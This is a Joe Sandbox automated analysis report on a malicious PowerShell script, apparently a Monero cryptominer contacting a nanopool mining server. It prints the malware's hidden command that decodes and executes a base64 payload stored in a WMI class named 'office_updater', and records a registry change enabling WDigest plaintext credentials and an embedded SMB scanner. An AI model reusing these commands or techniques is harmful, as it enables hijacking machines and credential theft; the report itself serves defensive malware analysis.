ID: Sample Name: in3.ps1 Cookbook: default.jbs Time: 04:05:00 Date: 24/01/2018 Version:


Table of Contents

  Analysis Report
    Overview
      Information
      Detection
      Confidence
      Classification
      Analysis Advice
    Signature Overview
      AV Detection
      Networking
      Boot Survival
      Persistence and Installation Behavior
      Data Obfuscation
      Spreading
      System Summary
      HIPS / PFW / Operating System Protection Evasion
      Anti Debugging
      Malware Analysis System Evasion
      Hooking and other Techniques for Hiding and Protection
      Language, Device and Operating System Detection
    Behavior Graph
    Simulations
      Behavior and APIs
    Antivirus Detection
      Initial Sample
      Dropped Files
      Domains
    Yara Overview
      Initial Sample
      PCAP (Network Traffic)
      Dropped Files
      Memory Dumps
      Unpacked PEs
    Joe Sandbox View / Context
      IPs
      Domains
      ASN
      Dropped Files
    Screenshot
    Startup
    Created / dropped Files
    Contacted Domains/Contacted IPs
      Contacted Domains
      Contacted IPs
    Static File Info
      File Icon
    Network Behavior
      Network Port Distribution
      TCP Packets
      UDP Packets
      DNS Queries
      DNS Answers
    Code Manipulations
    Statistics
      Behavior
    System Behavior
      Analysis Process: powershell.exe PID: 3084 Parent PID: 2836
        File Activities: File Created, File Deleted, File Written
        Registry Activities: Key Value Created
      Analysis Process: schtasks.exe PID: 3356 Parent PID: 3084
      Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084
      Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084
      Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084
      Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084
        File Activities
      Analysis Process: csc.exe PID: 3416 Parent PID: 3084
        File Activities
      Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416
        File Activities
      Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084
        File Activities
      Analysis Process: powershell.exe PID: 3464 Parent PID: 3084
        File Activities: File Created, File Deleted, File Written
      Analysis Process: csc.exe PID: 3552 Parent PID: 3464
      Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552
      Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084
    Disassembly
      Code Analysis

Copyright Joe Security LLC 2018 Page 2 of 26

Analysis Report

Overview

Information
  Joe Sandbox Version:
  Analysis ID:
  Start time: 04:05:00
  Start date:
  Joe Sandbox Product: CloudBasic
  Overall analysis duration: 0h 5m 57s
  Hypervisor based Inspection enabled:
  Report type: light
  Sample file name: in3.ps1
  Cookbook file name: default.jbs
  Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java )
  Number of analysed new started processes analysed: 19
  Number of new started drivers analysed: 0
  Number of existing processes analysed: 0
  Number of existing drivers analysed: 0
  Number of injected processes analysed: 0
  Technologies: HCA enabled, EGA enabled, HDC enabled
  Detection: MAL
  Classification: mal80.evad.troj.winps1@25/21@1/1
  HCA Information: Successful, ratio: 100%; Number of executed functions: 0; Number of non-executed functions: 0
  EGA Information: Failed
  HDC Information: Failed
  Cookbook Comments: Found application associated with file extension: .ps1
  Warnings:
    Exclude process from analysis (whitelisted): WmiPrvSE.exe, WmiApSrv.exe, conhost.exe, dllhost.exe
    Report size exceeded maximum capacity and may have missing behavior information.
    Report size getting too big, too many NtAllocateVirtualMemory calls found.
    Report size getting too big, too many NtOpenKeyEx calls found.
    Report size getting too big, too many NtQueryValueKey calls found.
    Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, csc.exe

Detection
  (score chart; axes and legend: Strategy, Score Range, Reporting, Detection Threshold, Report FP / FN)

Confidence
  (chart; axes and legend: Strategy, Score Range, Further Analysis Required?, Threshold)

Classification
  (classification chart over Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; scale: clean, suspicious, malicious)

Analysis Advice
  Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Signature Overview

AV Detection:
  Antivirus detection for submitted file

Networking:
  Performs DNS lookups
  Detected TCP or UDP traffic on non-standard ports
  Uses netstat to query active network connections and open ports

Boot Survival:
  Uses schtasks.exe or at.exe to add and modify task schedules

Persistence and Installation Behavior:
  Drops PE files

Data Obfuscation:
  Compiles C# or VB.Net code
  Suspicious powershell command line found

Spreading:
  Creates COM task schedule object (often to register a task for autostart)
  Enumerates the file system

System Summary:
  Uses Microsoft Silverlight
  Submission file is bigger than most known malware samples
  Uses new MSVCR Dlls
  Binary contains paths to debug symbols
  Classification label
  Creates files inside the user directory
  Creates temporary files
  Found command line output
  Parts of this application are using the .NET runtime (probably coded in C#)
  Queries process information (via WMI, Win32_Process)
  Reads ini files
  Reads software policies
  Sample is known by Antivirus (Virustotal or Metascan)
  Spawns processes
  Uses an in-process (OLE) Automation server
  Creates mutexes
  PE file does not import any functions
  Reads the hosts file
  Powershell connects to network
  Uses powercfg.exe to modify the power settings

HIPS / PFW / Operating System Protection Evasion:
  Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:
  Creates guard pages, often used to prevent reverse engineering and debugging
  Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  Enables debug privileges

Malware Analysis System Evasion:
  Queries a list of all running processes
  Enumerates the file system
  Found dropped PE file which has not been started or loaded
  May sleep (evasive loops) to hinder dynamic analysis
  Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Hooking and other Techniques for Hiding and Protection:
  Disables application error messages (SetErrorMode)
  System process connects to network (likely due to code injection or exploit)

Language, Device and Operating System Detection:
  Queries the cryptographic machine GUID
  Queries the installation date of Windows
  Queries the volume information (name, serial number etc) of a device

Behavior Graph
  (graph image; information recoverable from its labels)
  Sample: in3.ps1; Startdate: 24/01/2018; Architecture: WINDOWS; Score: 80
  Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious
  Process nodes: powershell.exe (Windows process; 1 created registry value, 12 created files), powershell.exe, NETSTAT.EXE, csc.exe, cvtres.exe, csc.exe, cvtres.exe, other processes
  Dropped files: unknown (ASCII); C:\Users\user\AppData\Local\...\rjax4qnu.dll (PE32); C:\Users\user\AppData\Local\...\oyswbnum.dll (PE32)
  DNS/IP Info: xmr-eu1.nanopool.org, port 14444, OVHFR (France), Is malicious
  Signatures shown on the graph: Antivirus detection for submitted file; Suspicious powershell command line found; Detected TCP or UDP traffic on non-standard ports; 3 other signatures; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); System process connects to network (likely due to code injection or exploit); Powershell connects to network

Simulations

Behavior and APIs
  Time | Type | Description
  04:05:17 | API Interceptor | 187x Sleep call for process: powershell.exe modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample
  Sample | Detection | Cloud Link
  in3.ps1 | 25% | virustotal

Dropped Files
  No Antivirus matches

Domains

  Domain | Detection | Cloud Link
  xmr-eu1.nanopool.org | 0% | virustotal

Yara Overview
  Initial Sample: No yara matches
  PCAP (Network Traffic): No yara matches
  Dropped Files: No yara matches
  Memory Dumps: No yara matches
  Unpacked PEs: No yara matches

Joe Sandbox View / Context
  IPs: No context
  Domains: No context
  ASN: No context
  Dropped Files: No context

Screenshot
  (screenshot image)

Startup
  System is w7
  powershell.exe (PID: 3084, cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nologo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\in3.ps1', MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    schtasks.exe (PID: 3356, cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f, MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    powercfg.exe (PID: 3368, cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0, MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
    powercfg.exe (PID: 3376, cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0, MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
    powercfg.exe (PID: 3384, cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca e45-459f-a27b-476b1d01c, MD5: E7E971AB21A6EDD2323C0FB37B9A0F)
    NETSTAT.EXE (PID: 3392, cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp, MD5: 32297BB17E6EC700D0FC869F9ACAF561)
    csc.exe (PID: 3416, cmdline: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig, MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)
      cvtres.exe (PID: 3424, cmdline: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp' 'c:\users\user\appdata\local\temp\csc278a.tmp', MD5: 200FC355F85ECD4DB77FB3CAB2D01364)
    NETSTAT.EXE (PID: 3440, cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp, MD5: 32297BB17E6EC700D0FC869F9ACAF561)
    powershell.exe (PID: 3464, cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:office_updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:office_updater').properties['funs'].value;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));invoke-command -ScriptBlock $RemoteScriptBlock $mon, 'Void', 0, '', '')', MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      csc.exe (PID: 3552, cmdline: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig, MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)
        cvtres.exe (PID: 3564, cmdline: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp' 'c:\users\user\appdata\local\temp\csc75bc.tmp', MD5: 200FC355F85ECD4DB77FB3CAB2D01364)
    NETSTAT.EXE (PID: 3596, cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp, MD5: 32297BB17E6EC700D0FC869F9ACAF561)
  cleanup

Created / dropped Files

  C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp
    File Type: data
    Size (bytes): 2064
  C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp
    File Type: data
    Size (bytes): 2064
  C:\Users\user\AppData\Local\Temp\CSC278A.tmp
    File Type: MSVC .res
    Size (bytes): 652
  C:\Users\user\AppData\Local\Temp\CSC75BC.tmp
    File Type: MSVC .res
    Size (bytes): 652
  C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs
    File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
    Size (bytes): 5826
  C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline
    File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
    Size (bytes): 327
  C:\Users\user\AppData\Local\Temp\oyswbnum.dll
    File Type: PE32 executable (DLL) (console) Intel Mono/.Net assembly, for MS Windows
    Size (bytes): 6656
  C:\Users\user\AppData\Local\Temp\oyswbnum.out
    File Type: ASCII text, with CRLF line terminators
    Size (bytes): 198
  C:\Users\user\AppData\Local\Temp\oyswbnum.pdb
    File Type: data
    Size (bytes):
  C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs
    File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
    Size (bytes): 5826
  C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline
    File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
    Size (bytes): 327
  C:\Users\user\AppData\Local\Temp\rjax4qnu.dll
    File Type: PE32 executable (DLL) (console) Intel Mono/.Net assembly, for MS Windows
    Size (bytes): 6656
  C:\Users\user\AppData\Local\Temp\rjax4qnu.out
    File Type: ASCII text, with CRLF line terminators
    Size (bytes): 198
  C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb
    File Type: data
    Size (bytes):
  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64QXU9TVGGU3OQHE5F7D.temp
    File Type: data
    Size (bytes): 8016
  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEAK7SA58B6AXIB1VI01.temp
    File Type: data
    Size (bytes): 8016
  unknown
    File Type: ASCII text, with CRLF line terminators
    Size (bytes): 778

Contacted Domains/Contacted IPs

Contacted Domains
  Name | IP | Active | Malicious | Antivirus Detection
  xmr-eu1.nanopool.org | | true | true | 0%, virustotal

Contacted IPs
  (map legend: No. of IPs < 25%, 25% < No. of IPs < 50%, 50% < No. of IPs < 75%, 75% < No. of IPs)
  IP | Country | ASN | ASN Name | Malicious
   | France | | OVHFR | true

Static File Info
  File type: ASCII text, with very long lines, with no line terminators
  Entropy (8bit):
  TrID:
  File name: in3.ps1
  File size:
  MD5: 9d2c27a1a6e18b0b815c938e05c03e7b
  SHA1: 4ef882b05566dc706fbc604b1bf771e8c7dab86a
  SHA256:
  SHA512:
  File Content Preview: $fa='sltah+6b8aaaa5+hxvwityjewb+2aldeulwb xmafulbitmafhewvvdujhamazbyg0bwoxadfaswsn VU1dWQVdJiyhMi30IUl5MicsxwEQPIsBIiQKJwUj30Um JwLBAUMHgBlBJiQFIg+wgv+qZblfoZf///0iDxDCFwHVF SIs+SI01TQAAALkABgAA86RIi0XwSItAGEiLQCBIiwB mg3highx2sitquif6ddmamgb16uylecc/xlfeg+gi

File Icon
  (icon image)

Network Behavior

Network Port Distribution
  Total Packets: undefined
  53 (DNS)

TCP Packets
  Timestamp | Port | Dest Port | IP | Dest IP
  (10 packets, each timestamped Jan 24, 04:07 CET; the port and IP columns are empty in the source)

UDP Packets
  Timestamp | Port | Dest Port | IP | Dest IP
  (2 packets, each timestamped Jan 24, 04:07 CET; the port and IP columns are empty in the source)

DNS Queries
  Timestamp | IP | Dest IP | Trans ID | OP Code | Name | Type | Class
  Jan 24, 04:07 CET | | | 0xd87d | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001)

DNS Answers
  Timestamp | IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
  Jan 24, 04:07 CET | | | 0xd87d | No error (0) | xmr-eu1.nanopool.org | | | A (IP address) | IN (0x0001)

Code Manipulations

Statistics

Behavior
  (chart over processes: powershell.exe, schtasks.exe, powercfg.exe, powercfg.exe, powercfg.exe, NETSTAT.EXE, csc.exe, cvtres.exe, NETSTAT.EXE, powershell.exe, csc.exe, cvtres.exe, NETSTAT.EXE)

System Behavior

Analysis Process: powershell.exe PID: 3084 Parent PID: 2836
  Start time: 04:05:14
  Start date: 24/01/2018
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Wow64 process (32bit):
  Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nologo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\in3.ps1'
  Imagebase: 0x755c0000

  File size: bytes
  MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
  Programmed in: .Net C# or VB.NET

File Activities

File Created
  File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
  C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.dll | read attributes and synchronize and generic read and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.out | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.err | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW

File Deleted
  File Path | Completion | Count | Address | Symbol
  C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline | success or wait | 1 | 1A101D2 | DeleteFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.dll | success or wait | 1 | 1A101D2 | DeleteFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp | success or wait | 1 | 1A101D2 | DeleteFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb | success or wait | 1 | 1A101D2 | DeleteFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.err | success or wait | 1 | 1A101D2 | DeleteFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | success or wait | 1 | 1A101D2 | DeleteFileW
  C:\Users\user\AppData\Local\Temp\rjax4qnu.out | success or wait | 1 | 1A101D2 | DeleteFileW

  Old File Path | New File Path | Completion | Count
  (no entries)

File Written
  File Path | Offset | Length | Value (hex) | Ascii | Completion | Count | Address | Symbol

  C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | unknown | 4096 | (hex dump omitted) | ...using System;..using System.Collections.Generic;..using System.diagnostics;..using System.IO;..using System.Net;..using System.Net.Sockets;..using System.Text;...namespace PingCastle.Scanners..{...public class m17sc...{...static public bool Scan(stri | success or wait | 1 | 1A108E7 | WriteFile
  C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | unknown | | (hex dump omitted) | der = new BinaryReader(ms);.....byte[] part1 = new byte[] {...0x00,0x00,0x00,0x00,...0xff,0x53,0x4d,0x42,...0x75,...0x00,...0x00,...0x00,0x00,...0x18,...0x01,0x28,...0x00,0x00,...0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x | success or wait | 1 | 1A108E7 | WriteFile

  C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline | unknown | 327 | (hex dump omitted) | .../t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\gac_msil\system.Management.automation\ bf3856ad364e35\System.Management.automation.dll" /out:"c:\users\user\appdata\local\temp\rjax4qnu.dll" /D:DEBUG /debug+ /optimize- | success or wait | 1 | 1A108E7 | WriteFile
  C:\Users\user\AppData\Local\Temp\rjax4qnu.out | unknown | 422 | (hex dump omitted) | ...C:\Users\user\Desktop>"C:\Windows\Microsoft.NET\Framework\v \csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf3856ad364e35\System.management.automation.dll" /o | success or wait | 1 | 1A108E7 | WriteFile

Registry Activities

Key Value Created
  Key Path | Name | Type | Data | Completion | Count | Address | Symbol
  HKEY_LOCAL_MACHINE\SYSTEM\Controlset001\control\securityproviders\wdigest | UseLogonCredential | dword | 1 | success or wait | 1 | 1A137EA | RegSetValueExW

Analysis Process: schtasks.exe PID: 3356 Parent PID: 3084
  Start time: 04:06:19
  Start date: 24/01/2018
  Path: C:\Windows\System32\schtasks.exe
  Wow64 process (32bit):
  Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f
  Imagebase: 0x774a0000
  File size: bytes
  MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
  Programmed in: C, C++ or other language

Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084
  Start time: 04:06:19
  Start date: 24/01/2018
  Path: C:\Windows\System32\powercfg.exe
  Wow64 process (32bit):
  Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0
  Imagebase: 0x
  File size: bytes
  MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
  Programmed in: C, C++ or other language

Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084
  Start time: 04:06:19
  Start date: 24/01/2018
  Path: C:\Windows\System32\powercfg.exe
  Wow64 process (32bit):
  Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0
  Imagebase: 0x
  File size: bytes
  MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
  Programmed in: C, C++ or other language

Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084
  Start time: 04:06:20
  Start date: 24/01/2018
  Path: C:\Windows\System32\powercfg.exe
  Wow64 process (32bit):
  Commandline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca e45-459f-a27b-476b1d01c
  Imagebase: 0x
  File size: bytes
  MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F

  Programmed in: C, C++ or other language

Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084
  Start time: 04:06:20
  Start date: 24/01/2018
  Path: C:\Windows\System32\NETSTAT.EXE
  Wow64 process (32bit):
  Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
  Imagebase: 0x74d
  File size: bytes
  MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
  Programmed in: C, C++ or other language

File Activities
  File Path | Offset | Length | Value | Ascii | Completion | Count
  (no entries)

Analysis Process: csc.exe PID: 3416 Parent PID: 3084
  Start time: 04:06:23
  Start date: 24/01/2018
  Path: C:\Windows\Microsoft.NET\Framework\v \csc.exe
  Wow64 process (32bit):
  Commandline: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig er\appdata\local\temp\rjax4qnu.cmdline'
  Imagebase: 0x75a
  File size: bytes
  MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D
  Programmed in: .Net C# or VB.NET

File Activities
  File Path | Access | Attributes | Options | Completion | Count
  (no entries)
  File Path | Completion | Count
  (no entries)
  File Path | Offset | Length | Value | Ascii | Completion | Count
  (no entries)

Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416
  Start time: 04:06:23
  Start date: 24/01/2018
  Path: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe
  Wow64 process (32bit):

  Commandline: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp' 'c:\users\user\AppData\Local\Temp\CSC278A.tmp'
  Imagebase: 0x752a
  File size: bytes
  MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364
  Programmed in: C, C++ or other language

File Activities
  File Path | Offset | Length | Value | Ascii | Completion | Count
  (no entries)

Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084
  Start time: 04:06:24
  Start date: 24/01/2018
  Path: C:\Windows\System32\NETSTAT.EXE
  Wow64 process (32bit):
  Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
  Imagebase: 0x74d
  File size: bytes
  MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
  Programmed in: C, C++ or other language

File Activities
  File Path | Offset | Length | Value | Ascii | Completion | Count
  (no entries)

Analysis Process: powershell.exe PID: 3464 Parent PID: 3084
  Start time: 04:06:24
  Start date: 24/01/2018
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Wow64 process (32bit):
  Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:office_updater').properties['mon'].value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.convert]::frombase64string($funs)));invoke-command -ScriptBlock $RemoteScriptBlock - $mon, 'Void', 0, '', '')'
  Imagebase: 0x774a
  File size: bytes
  MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
  Programmed in: .Net C# or VB.NET

File Activities

File Created
  File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
  C:\Users\user\AppData\Local\Temp\oyswbnum.tmp | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | F | | CreateFileW

  C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | F | | CreateFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.dll | read attributes and synchronize and generic read and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | F | | CreateFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | F | | CreateFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.out | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | F | | CreateFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.err | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | F | | CreateFileW

File Deleted
  File Path | Completion | Count | Address | Symbol
  C:\Users\user\AppData\Local\Temp\oyswbnum.dll | success or wait | D2 | | DeleteFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.pdb | success or wait | D2 | | DeleteFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.out | success or wait | D2 | | DeleteFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.err | success or wait | D2 | | DeleteFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline | success or wait | D2 | | DeleteFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.tmp | success or wait | D2 | | DeleteFileW
  C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs | success or wait | D2 | | DeleteFileW

  Old File Path | New File Path | Completion | Count
  (no entries)

File Written
  File Path | Offset | Length | Value (hex) | Ascii | Completion | Count | Address | Symbol

24 File Path Offset Length Value Ascii Completion Count C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs unknown 4096 ef bb bf e 67...using System;..using d 3b 0d 0a e d 2e 43 6f 6c 6c f 6e 73 2e e b 0d 0a e d 2e e 6f b 0d 0a e d 2e 49 4f 3b 0d 0a 75 System.Collections.Generic;..usin g S ystem.diagnostics;..using System.IO;..using System.Net;..using System.Net.Sockets;..usin g System.Text;...namespac e PingCastle.Scanners.. {...public class m17sc... {...static public bool Scan(stri e d 2e 4e b 0d 0a e d 2e 4e e 53 6f 63 6b b 0d 0a e d 2e b 0d 0a 0d 0a 6e 61 6d e c 65 2e e 6e d 0a 7b 0d 0a c c d d 0a 09 7b 0d 0a c f 6f 6c e C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs unknown d 20 6e e d b 0d 0a b 5d d 20 6e b 5d 20 7b 0d 0a c c c c 20 0d 0a c c c c 20 0d 0a c 20 0d 0a c 20 0d 0a c 20 0d 0a c c 20 0d 0a c 20 0d 0a c c 20 0d 0a c c 20 0d 0a c c c c c c c success or wait WriteFile der = new BinaryReader(ms);.....byte[] part1 = new byte[] {...0x00,0x00,0x00,0x00,...0xff,0x53,0x4d,0x42,...0x75,...0x00,...0x00,...0x00,0x00,...0x18,...0x01,0x28,...0x00,0x00,...0x00,0x00,0x00,0x00,0 x00,0x00,0x00,0x success or wait WriteFile Copyright Joe Security LLC 2018 Page 24 of 26

25 File Path Offset Length Value Ascii Completion Count C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69.../t:library /utf8output /R:" success or wait WriteFile f f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 System.dll" /R:"C:\Windows\ass embly\gac_msil\system. Manageme nt.automation\ bf385 6ad364e35\System.Manag ement.automation.dll" /out:"c:\users\u ser\appdata\local\temp\o yswbnum.dll" /D:DEBUG /debug+ /optimize- 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f a a 5c c c b e 5c c 4c 6f c 5c d 70 5c 6f e 75 6d 2e 64 6c 6c f 44 3a f b 20 2f 6f d 69 7a 65 2d 20 C:\Users\user\AppData\Local\Temp\oyswbnum.out unknown 422 ef bb bf 43 3a 5c C:\Users\user\Desktop> success or wait WriteFile c c b e 5c b 74 6f 70 3e a 5c e 64 6f c 4d 69 "C:\ Windows\Microsoft.NET\Fr amewor k\v \csc.exe" /t:library /utf8output /R:"System.dll" f 73 6f e /R:"C:\Windows\assembly\ 4e c d f 72 6b 5c e 30 2e c e f 74 3a 6c f GAC_M SIL\System.Management. Automati on\ bf3856ad36 4e35\S ystem.management.autom ation.dll" /o 38 6f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f Analysis Process: csc.exe PID: 3552 Parent PID: 3464 Start time: 04:06:42 Start date: 24/01/2018 Path: C:\Windows\Microsoft.NET\Framework\v \csc.exe Wow64 process (32bit): Copyright Joe Security LLC 2018 Page 25 of 26

